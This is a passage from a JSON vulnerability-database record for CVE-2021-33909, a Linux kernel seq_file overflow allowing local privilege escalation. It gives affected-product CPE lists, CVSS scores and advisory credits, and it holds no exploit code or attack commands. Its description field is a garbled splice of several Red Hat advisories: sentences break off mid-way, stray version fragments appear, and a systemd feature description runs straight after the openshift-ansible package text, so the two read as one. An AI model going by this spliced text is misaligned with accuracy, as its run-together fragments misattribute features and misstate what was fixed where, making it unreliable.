                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.4.2-02044",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-33909",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-33909",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-33909",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-33909",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 8.1) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7.7) - ppc64, ppc64le, x86_64\n\n3. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nBug Fix(es):\n\n* [RHEL7.9.z] n_tty_open: \"BUG: unable to handle kernel paging request\"\n(BZ#1872778)\n\n* [ESXi][RHEL7.8]\"qp_alloc_hypercall result = -20\" / \"Could not attach to\nqueue pair with -20\" with vSphere Fault Tolerance enabled (BZ#1892237)\n\n* [RHEL7.9][s390x][Regression] Sino Nomine swapgen IBM z/VM emulated DASD\nwith DIAG driver returns EOPNOTSUPP (BZ#1910395)\n\n* False-positive hard lockup detected while processing the thread state\ninformation (SysRq-T) (BZ#1912221)\n\n* RHEL7.9 zstream - s390x LPAR with NVMe SSD will panic when it has 32 or\nmore IFL (pci) (BZ#1917943)\n\n* The NMI watchdog detected a hard lockup while printing RCU CPU stall\nwarning messages to the serial console (BZ#1924688)\n\n* nvme hangs when trying to allocate reserved tag (BZ#1926825)\n\n* [REGRESSION] \"call into AER handling regardless of severity\" triggers\ndo_recovery() unnecessarily on correctable PCIe errors (BZ#1933663)\n\n* Module nvme_core: A double free  of the kmalloc-512 cache between\nnvme_trans_log_temperature() and nvme_get_log_page(). (BZ#1946793)\n\n* sctp - SCTP_CMD_TIMER_START queues active timer kernel BUG at\nkernel/timer.c:1000! (BZ#1953052)\n\n* [Hyper-V][RHEL-7]When CONFIG_NET_POLL_CONTROLLER is set, mainline commit\n2a7f8c3b1d3fee is needed (BZ#1953075)\n\n* Kernel panic at cgroup_is_descendant (BZ#1957719)\n\n* [Hyper-V][RHEL-7]Commits To Fix Kdump Failures (BZ#1957803)\n\n* IGMPv2 JOIN packets incorrectly routed to loopback (BZ#1958339)\n\n* [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap\n[7.9.z] (BZ#1960193)\n\n* mlx4: Fix memory allocation in mlx4_buddy_init needed (BZ#1962406)\n\n* incorrect assertion on pi_state-\u003epi_mutex.wait_lock from\npi_state_update_owner() (BZ#1965495)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c\n1902788 - CVE-2019-20934 kernel: use-after-free in show_numa_stats function\n1961300 - CVE-2021-33033 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c\n1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan\n1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 
7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1160.36.2.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1160.36.2.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1160.36.2.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-devel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-headers-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1160.36.2.el7.s390x.rpm\nperf-3.10.0-1160.36.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\npython-perf-3.10.0-1160.36.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2
.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. \nThese packages include redhat-release-virtualization-host. \nRHVH features a Cockpit user interface for monitoring the host\u0027s resources\nand\nperforming administrative tasks. \n\nBug Fix(es):\n\n* xfs umount hangs in xfs_wait_buftarg() due to negative bt_io_count\n(BZ#1949916)\n\n4. \n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nAnsible is a SSH-based configuration management, deployment, and task\nexecution system. The openshift-ansible packages contain Ansible code and\nplaybooks for installing and upgrading OpenShift Container Platform 3. It provides\naggressive parallelism capabilities, uses socket and D-Bus activation for\nstarting services, offers on-demand starting of daemons, and keeps track of\nprocesses using Linux cgroups. 
In addition, it supports snapshotting and\nrestoring of the system state, maintains mount and automount points, and\nimplements an elaborate transactional dependency-based service control\nlogic. It can also work as a drop-in replacement for sysvinit. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.3.z source tree\n(BZ#1957359)\n\n* Placeholder bug for OCP 4.7.0 rpm release (BZ#1983534)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.8.2 bug fix and security update\nAdvisory ID:       RHSA-2021:2438-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2438\nIssue date:        2021-07-27\nCVE Names:         CVE-2016-2183 CVE-2020-7774 CVE-2020-15106 \n                   CVE-2020-15112 CVE-2020-15113 CVE-2020-15114 \n                   CVE-2020-15136 CVE-2020-26160 CVE-2020-26541 \n                   CVE-2020-28469 CVE-2020-28500 CVE-2020-28852 \n                   CVE-2021-3114 CVE-2021-3121 CVE-2021-3516 \n                   CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 \n                   CVE-2021-3537 CVE-2021-3541 CVE-2021-3636 \n                   CVE-2021-20206 CVE-2021-20271 CVE-2021-20291 \n                   CVE-2021-21419 CVE-2021-21623 CVE-2021-21639 \n                   CVE-2021-21640 CVE-2021-21648 CVE-2021-22133 \n                   CVE-2021-23337 CVE-2021-23362 CVE-2021-23368 \n                   CVE-2021-23382 CVE-2021-25735 CVE-2021-25737 \n                   CVE-2021-26539 CVE-2021-26540 CVE-2021-27292 \n                   CVE-2021-28092 CVE-2021-29059 CVE-2021-29622 \n                   CVE-2021-32399 CVE-2021-33034 CVE-2021-33194 \n                   CVE-2021-33909 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.8.2 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.8.2. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2437\n\nSpace precludes documenting all of the container images in this advisory. 
\nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel\nease-notes.html\n\nSecurity Fix(es):\n\n* SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n(CVE-2016-2183)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* etcd: Large slice causes panic in decodeRecord method (CVE-2020-15106)\n\n* etcd: DoS in wal/wal.go (CVE-2020-15112)\n\n* etcd: directories created via os.MkdirAll are not checked for permissions\n(CVE-2020-15113)\n\n* etcd: gateway can include itself as an endpoint resulting in resource\nexhaustion and leads to DoS (CVE-2020-15114)\n\n* etcd: no authentication is performed against endpoints provided in the\n- --endpoints flag (CVE-2020-15136)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve\n(CVE-2021-3114)\n\n* containernetworking-cni: Arbitrary path injection via type field in CNI\nconfiguration (CVE-2021-20206)\n\n* containers/storage: DoS via malicious image (CVE-2021-20291)\n\n* prometheus: open redirect under the /new endpoint (CVE-2021-29622)\n\n* golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)\n\n* go.elastic.co/apm: leaks sensitive HTTP headers during panic\n(CVE-2021-22133)\n\nSpace precludes listing in detail the following additional CVEs fixes:\n(CVE-2021-27292), (CVE-2021-28092), (CVE-2021-29059), (CVE-2021-23382),\n(CVE-2021-26539), (CVE-2021-26540), (CVE-2021-23337), (CVE-2021-23362) and\n(CVE-2021-23368)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-x86_64\n\nThe image digest is\nssha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-s390x\n\nThe image digest is\nsha256:a284c5c3fa21b06a6a65d82be1dc7e58f378aa280acd38742fb167a26b91ecb5\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-ppc64le\n\nThe image digest is\nsha256:da989b8e28bccadbb535c2b9b7d3597146d14d254895cd35f544774f374cdd0f\n\nAll OpenShift Container Platform 4.8 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. 
Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1725981 - oc explain does not work well with full resource.group names\n1747270 - [osp] Machine with name \"\u003ccluster-id\u003e-worker\"couldn\u0027t join the cluster\n1772993 - rbd block devices attached to a host are visible in unprivileged container pods\n1786273 - [4.6] KAS pod logs show \"error building openapi models ... has invalid property: anyOf\" for CRDs\n1786314 - [IPI][OSP] Install fails on OpenStack with self-signed certs unless the node running the installer has the CA cert in its system trusts\n1801407 - Router in v4v6 mode puts brackets around IPv4 addresses in the Forwarded header\n1812212 - ArgoCD example application cannot be downloaded from github\n1817954 - [ovirt] Workers nodes are not numbered sequentially\n1824911 - PersistentVolume yaml editor is read-only with system:persistent-volume-provisioner ClusterRole\n1825219 - openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with \"Unable to connect to the server\"\n1825417 - 